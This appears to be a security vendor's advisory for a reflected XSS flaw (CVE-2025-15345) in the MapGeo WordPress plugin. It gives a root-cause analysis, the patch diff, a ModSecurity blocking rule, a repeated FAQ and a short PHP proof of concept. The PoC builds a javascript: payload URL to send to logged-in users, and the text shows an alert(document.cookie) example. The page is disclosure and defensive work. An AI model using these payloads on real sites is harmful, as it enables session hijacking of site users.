What is CVE-2025-15345?

CVE-2025-15345 is a Reflected Cross-Site Scripting (XSS) vulnerability in the MapGeo – Interactive Geo Maps plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘map’ parameter in the display-map shortcode, affecting versions up to and including 1.6.27.

How does the vulnerability work?

The vulnerability occurs when the plugin fails to properly validate and sanitize the ‘map’ parameter. An attacker can craft a malicious URL containing a payload, such as ‘javascript:alert(1)’, which executes when a user clicks the link, allowing the attacker to run scripts in the user’s browser.

Who is affected by this vulnerability?

Any WordPress site using the MapGeo – Interactive Geo Maps plugin version 1.6.27 or earlier is at risk. Administrators should check their installed plugins and versions to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, review the version of the MapGeo plugin installed. If it is version 1.6.27 or earlier, your site is susceptible to CVE-2025-15345. Additionally, you can test for the vulnerability by attempting to use the vulnerable ‘map’ parameter in a crafted URL.

How can I fix CVE-2025-15345?

The vulnerability is fixed in version 1.6.28 of the MapGeo plugin. Updating to this version or later will mitigate the risk associated with this vulnerability. Always ensure that your plugins are kept up to date.

What if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the MapGeo plugin until a patch can be applied. Additionally, review user permissions and educate users about the risks of clicking unknown links.

What does a CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity risk. This means that while the vulnerability is not critical, it can still be exploited under certain conditions, potentially leading to significant impacts such as data theft or session hijacking.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the victim’s browser. This could lead to session hijacking, redirection to malicious sites, or unauthorized actions performed on behalf of the user.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can craft a URL with the ‘map’ parameter set to a JavaScript payload. When a user clicks this link, the malicious script executes, demonstrating the XSS vulnerability and the potential for exploitation.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately investigate your site for unauthorized changes or suspicious activity. Change passwords, review logs, and consider restoring from a backup. It may also be necessary to conduct a security audit of your site.

Is this vulnerability persistent or reflected?

CVE-2025-15345 is a reflected XSS vulnerability, meaning the malicious script is not stored on the server but is executed immediately when the crafted URL is accessed. This requires user interaction to exploit.

What are the long-term implications of this vulnerability?

Long-term implications include potential damage to user trust and the risk of data breaches. Regularly updating plugins and implementing security best practices are essential to mitigate such vulnerabilities in the future.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 13, 2026

CVE-2025-15345: MapGeo – Interactive Geo Maps <= 1.6.27 – Reflected Cross-Site Scripting via 'map' Parameter (interactive-geo-maps)

CVE ID CVE-2025-15345

Plugin interactive-geo-maps

Severity Medium (CVSS 6.1)

CWE 80

Vulnerable Version 1.6.27

Patched Version 1.6.28

Disclosed May 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15345:
This vulnerability is a Reflected Cross-Site Scripting (XSS) issue in the MapGeo – Interactive Geo Maps plugin for WordPress, affecting versions up to and including 1.6.27. The flaw exists in the display-map shortcode’s handling of the ‘map’ parameter, allowing an unauthenticated attacker to inject arbitrary web scripts. The issue has a CVSS score of 6.1, indicating a medium severity risk.

The root cause resides in the file interactive-geo-maps/src/Plugin/Map.php, lines 78-88 (as shown in the diff). The vulnerability occurs within the shortcode rendering logic when the ‘demo’ attribute is set. In the vulnerable code, the plugin directly used sanitize_text_field() on the $_GET[‘map’] parameter and assigned the result to the map variable without any validation that it was not a URL. Specifically, line 83 of the patched diff shows the previous code was: $main_meta[‘map’] = sanitize_text_field( $_GET[‘map’] ). This sanitization function removes tags and encodes entities, but it does not remove ‘javascript:’ URIs or other XSS vectors that can be embedded in URL-like strings. The parameter is later used in generating JavaScript for the map, making it a vector for script injection.

Exploitation requires an attacker to craft a malicious link containing the ‘map’ parameter with a payload like ‘javascript:alert(1)’ or a URL pointing to an external malicious script. The attack vector is via the ‘display-map’ shortcode with the ‘demo’ attribute set to true. An attacker would use a URL such as: https://example.com/?map=javascript:alert(document.cookie). When a user clicks this link and the page renders the vulnerable shortcode, the malicious JavaScript executes in the context of the user’s session. No authentication is required, only user interaction (clicking a crafted link).

The patch in version 1.6.28 introduces a critical check. After sanitizing the ‘map’ parameter, it adds a filter_var($map_param, FILTER_VALIDATE_URL) validation. If the parameter is a valid URL (as determined by PHP’s filter_var function), the assignment to $main_meta[‘map’] is skipped entirely. This means any attempt to inject a URL-based payload (including javascript: URIs, which FILTER_VALIDATE_URL considers valid) will be ignored by the plugin. The patch effectively breaks the exploitation path by preventing any URL-like input from influencing the map rendering.

If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s browser. This allows the attacker to perform actions such as stealing session cookies, redirecting users to phishing sites, performing actions on behalf of the user, or defacing the page. Since the vulnerability is reflected (non-persistent), the attacker must trick the user into clicking a malicious link, limiting the scale of attack. However, the lack of authentication requirements makes it a viable vector for targeted phishing campaigns.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/interactive-geo-maps/interactive-geo-maps.php
+++ b/interactive-geo-maps/interactive-geo-maps.php
@@ -7,7 +7,7 @@
  * Plugin Name:       MapGeo - Interactive Geo Maps
  * Plugin URI:        https://interactivegeomaps.com/
  * Description:       Create interactive geographic vector maps of the world, continents or any country in the world. Color full regions or create markers on specific locations that will have information on hover and can also have actions on click. This plugin uses the online amcharts library to generate the maps.
- * Version:           1.6.27
+ * Version:           1.6.28
  * Requires PHP:      7.0
  * Author:            MapGeo
  * Author URI:        https://interactivegeomaps.com
@@ -39,23 +39,24 @@
                     require_once dirname( __FILE__ ) . '/vendor/freemius/wordpress-sdk/start.php';
                 }
                 $igmfreemiusinit = fs_dynamic_init( [
-                    'id'             => '5114',
-                    'slug'           => 'interactive-geo-maps',
-                    'type'           => 'plugin',
-                    'public_key'     => 'pk_81cc828e3f6fa811c70bab7631a4f',
-                    'is_premium'     => false,
-                    'premium_suffix' => 'PRO',
-                    'has_addons'     => true,
-                    'has_paid_plans' => true,
-                    'trial'          => [
+                    'id'               => '5114',
+                    'slug'             => 'interactive-geo-maps',
+                    'type'             => 'plugin',
+                    'public_key'       => 'pk_81cc828e3f6fa811c70bab7631a4f',
+                    'is_premium'       => false,
+                    'premium_suffix'   => 'PRO',
+                    'has_addons'       => true,
+                    'has_paid_plans'   => true,
+                    'trial'            => [
                         'days'               => 7,
                         'is_require_payment' => true,
                     ],
-                    'menu'           => [
+                    'menu'             => [
                         'slug'    => 'edit.php?post_type=igmap',
                         'support' => false,
                     ],
-                    'is_live'        => true,
+                    'is_live'          => true,
+                    'is_org_compliant' => true,
                 ] );
             }
             return $igmfreemiusinit;
@@ -120,7 +121,7 @@
         add_action( 'plugins_loaded', function () use($framework) {
             $plugin = new Core(
                 'interactive-geo-maps',
-                '1.6.27',
+                '1.6.28',
                 __FILE__,
                 $framework
             );
--- a/interactive-geo-maps/src/Plugin/Map.php
+++ b/interactive-geo-maps/src/Plugin/Map.php
@@ -78,9 +78,16 @@
                 $main_meta['roundMarkers'] = array_merge( $main_meta['roundMarkers'], $json_meta );
             }
         }
-        // in case we use this shortcode for demo purposes, the map that will render might ne in the URL
+        /**
+         * Prevent loading arbitrary external scripts by restricting map param to non-URLs only to prevent XSS vulnerabilities.
+         * To test pass map name as a query parameter, e.g. ?map=kenyaHigh
+         * Trying to pass a URL will be ignored, e.g. ?map=http://malicious.com/malicious.js
+         */
         if ( isset( $atts['demo'] ) && isset( $_GET['map'] ) ) {
-            $main_meta['map'] = sanitize_text_field( $_GET['map'] );
+            $map_param = sanitize_text_field( $_GET['map'] );
+            if ( !filter_var( $map_param, FILTER_VALIDATE_URL ) ) {
+                $main_meta['map'] = $map_param;
+            }
         }
         $meta = $this->prepare_meta( $main_meta, $id );
         if ( !is_array( $meta ) ) {
--- a/interactive-geo-maps/vendor/composer/autoload_static.php
+++ b/interactive-geo-maps/vendor/composer/autoload_static.php
@@ -12,27 +12,27 @@
     );

     public static $prefixLengthsPsr4 = array (
-        'S' =>
+        'S' =>
         array (
             'Saltus\WP\Plugin\Saltus\InteractiveMaps\' => 40,
             'Saltus\WP\Framework\' => 20,
         ),
-        'N' =>
+        'N' =>
         array (
             'Noodlehaus\' => 11,
         ),
     );

     public static $prefixDirsPsr4 = array (
-        'Saltus\WP\Plugin\Saltus\InteractiveMaps\' =>
+        'Saltus\WP\Plugin\Saltus\InteractiveMaps\' =>
         array (
             0 => __DIR__ . '/../..'.'/build' . '/../src',
         ),
-        'Saltus\WP\Framework\' =>
+        'Saltus\WP\Framework\' =>
         array (
             0 => __DIR__ . '/..' . '/saltus/framework/src',
         ),
-        'Noodlehaus\' =>
+        'Noodlehaus\' =>
         array (
             0 => __DIR__ . '/..' . '/hassankhan/config/src',
         ),
--- a/interactive-geo-maps/vendor/composer/installed.php
+++ b/interactive-geo-maps/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'interactivegeomaps/interactive-geo-maps',
         'pretty_version' => 'dev-main',
         'version' => 'dev-main',
-        'reference' => '37fa5638a0ef504ec3a948375f06cf8b3b49ff29',
+        'reference' => '00cd7116468df5e1de8c6d4d15d3565a91f39bf8',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../build',
         'aliases' => array(),
@@ -31,7 +31,7 @@
         'interactivegeomaps/interactive-geo-maps' => array(
             'pretty_version' => 'dev-main',
             'version' => 'dev-main',
-            'reference' => '37fa5638a0ef504ec3a948375f06cf8b3b49ff29',
+            'reference' => '00cd7116468df5e1de8c6d4d15d3565a91f39bf8',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../build',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2025-15345 MapGeo Reflected XSS via map parameter',severity:'CRITICAL',tag:'CVE-2025-15345',t:none,t:urlDecodeUni"
SecRule ARGS:map "@rx ^(?:https?|ftp|file|javascript:|data:|vbscript:)" "chain"
SecRule REQUEST_URI "@contains ?" "chain"
SecRule ARGS:map "@rx [<>'\(\)]" "t:none,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15345 - MapGeo - Interactive Geo Maps <= 1.6.27 - Reflected Cross-Site Scripting via 'map' Parameter

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// Exploit payload: Using javascript: protocol to execute XSS
// The map parameter is passed via GET to trigger the vulnerable shortcode with 'demo' attribute
$exploit_params = array(
    'map' => 'javascript:alert("XSS_Test")'
);

// Craft the malicious URL
$exploit_url = $target_url . '/?' . http_build_query($exploit_params);

echo "[+] Atomic Edge CVE-2025-15345 Proof of Conceptn";
echo "[+] Target URL: " . $target_url . "n";
echo "[+] Exploit URL: " . $exploit_url . "nn";

echo "[*] To exploit: Send this link to a logged-in WordPress user.n";
echo "[*] The JavaScript will execute when they click the link.nn";

// Make the request to verify the vulnerability (optional)
echo "[*] Sending request to verify...n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Request successful (HTTP 200). Check if the payload executed in the browser.n";
} else {
    echo "[-] Request failed with HTTP code: " . $http_code . "n";
}

echo "n[*] Manual test: Open the exploit URL in a browser.n";

Frequently Asked Questions

What is CVE-2025-15345?
Overview of the vulnerability
CVE-2025-15345 is a Reflected Cross-Site Scripting (XSS) vulnerability in the MapGeo – Interactive Geo Maps plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘map’ parameter in the display-map shortcode, affecting versions up to and including 1.6.27.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the plugin fails to properly validate and sanitize the ‘map’ parameter. An attacker can craft a malicious URL containing a payload, such as ‘javascript:alert(1)’, which executes when a user clicks the link, allowing the attacker to run scripts in the user’s browser.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the MapGeo – Interactive Geo Maps plugin version 1.6.27 or earlier is at risk. Administrators should check their installed plugins and versions to determine if they are affected.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, review the version of the MapGeo plugin installed. If it is version 1.6.27 or earlier, your site is susceptible to CVE-2025-15345. Additionally, you can test for the vulnerability by attempting to use the vulnerable ‘map’ parameter in a crafted URL.
How can I fix CVE-2025-15345?
Updating the plugin
The vulnerability is fixed in version 1.6.28 of the MapGeo plugin. Updating to this version or later will mitigate the risk associated with this vulnerability. Always ensure that your plugins are kept up to date.
What if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the MapGeo plugin until a patch can be applied. Additionally, review user permissions and educate users about the risks of clicking unknown links.
What does a CVSS score of 6.1 indicate?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity risk. This means that while the vulnerability is not critical, it can still be exploited under certain conditions, potentially leading to significant impacts such as data theft or session hijacking.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of the victim’s browser. This could lead to session hijacking, redirection to malicious sites, or unauthorized actions performed on behalf of the user.
How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept shows how an attacker can craft a URL with the ‘map’ parameter set to a JavaScript payload. When a user clicks this link, the malicious script executes, demonstrating the XSS vulnerability and the potential for exploitation.
What should I do if I suspect my site has been exploited?
Response steps for administrators
If you suspect exploitation, immediately investigate your site for unauthorized changes or suspicious activity. Change passwords, review logs, and consider restoring from a backup. It may also be necessary to conduct a security audit of your site.
Is this vulnerability persistent or reflected?
Understanding the type of XSS
CVE-2025-15345 is a reflected XSS vulnerability, meaning the malicious script is not stored on the server but is executed immediately when the crafted URL is accessed. This requires user interaction to exploit.
What are the long-term implications of this vulnerability?
Impact on site security
Long-term implications include potential damage to user trust and the risk of data breaches. Regularly updating plugins and implementing security best practices are essential to mitigate such vulnerabilities in the future.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations